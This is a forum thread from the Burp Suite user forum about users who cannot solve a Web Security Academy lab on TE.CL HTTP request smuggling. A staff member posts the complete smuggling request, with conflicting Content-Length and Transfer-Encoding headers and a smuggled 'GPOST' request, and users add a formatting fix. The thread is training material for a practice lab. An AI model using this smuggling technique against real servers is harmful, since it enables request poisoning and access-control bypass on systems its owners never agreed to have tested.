Burp Suite User Forum

Login to post

Lab: HTTP request smuggling, basic TE.CL vulnerability

Adnanmig | Last updated: Aug 28, 2019 07:06PM UTC

Hi, When following the solution to this lab, the second request results in bad request error and not the expected result of the lab. I have tried it with Burp and curl with the same result. Not sure what I am missing? Can you please help? thanks.

Liam, PortSwigger Agent | Last updated: Aug 29, 2019 01:29PM UTC

The lab works in our testing. Have you tried resetting the lab?

Burp User | Last updated: Sep 01, 2019 04:20PM UTC

Yes, I have reset the lab multiple times but not getting the expected results.

Liam, PortSwigger Agent | Last updated: Sep 02, 2019 02:32PM UTC

The lab and solution work in our testings and other users have completed the lab. Keep trying.

Burp User | Last updated: Oct 29, 2019 01:34AM UTC

Hello Liam, Question. I am unable to submit the solution in the lab for this , and it keeps spamming back 400 bad Request and also 500 internal server error. i have even used the bAppStore plugin, is it becuase ... I have did the whole steps including the /r/n/r/n at the end of the request still no 404. please advise, if this is a lab error, or it no longer works. Im almost done and this is blocking completion. How do i reset lab as well? i have just been waiting for session time out, and log out and log back in. I can email you directly as i have some completion for some Request smuggling practioner exercises, but this one just doesnt seem to work. thank you

Ben, PortSwigger Agent | Last updated: Oct 29, 2019 10:44AM UTC

Hi Bob, Due to some recent changes in our lab infrastructure, the previously listed solution for the Request Smuggling labs may no longer be correct. While our development team is working on addressing this issue, the following workaround should allow you to progress through the labs as normal. Each request is now required to have a Host header in order to be successfully processed by the lab server (this also means that the lab user needs to work out the new offsets involved). This needs to be applied to any requests issued to the lab in order to bypass this new validation. Please let us know if you need any further assistance.

Ben, PortSwigger Agent | Last updated: Oct 29, 2019 01:39PM UTC

Hi Bob, Just to follow up on the previous message. The development team have been busy working on the Request Smuggling labs today and, to make things simpler for our Web Academy users, they have reverted the labs back to their original settings. This should mean that all of the labs are now solvable using the solutions provided. I have just tried the lab that you have been working on and have confirmed that it is now solvable using the original solution provided. Please try again and let us know if you are now able to successfully solve it. Apologies for the confusion that this may have caused you. Please let us know if you need any further assistance with anything else in the future.

mark | Last updated: Apr 14, 2020 07:12AM UTC

sorry to say but i am facing the same issue http/1.1 404 bad request error:Read timeout after 10000ms

mark | Last updated: Apr 14, 2020 07:13AM UTC

please let me know weather any extensions are the reason or and problem with code or server side

Uthman, PortSwigger Agent | Last updated: Apr 14, 2020 10:20AM UTC

Hi, I have just tested the lab and it works. Please see below: POST / HTTP/1.1 Host: <lab-ID>.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 For the host, try leaving out https://. The second time you submit this request in Repeater, you should see a 403 Forbidden response along with the "Unrecognized method GPOST" message. Refresh the lab and it will be marked as solved. Please give this a try and let me know how you get on.

mark | Last updated: Apr 14, 2020 11:06AM UTC

got it the error is solved

mark | Last updated: Apr 14, 2020 11:07AM UTC

enter twice after zero and the code executes

Frank | Last updated: Nov 17, 2020 02:08PM UTC

thanks entering twice "enter" after the 0 it solved the error

You need to Log in to post a reply. Or register here, for free.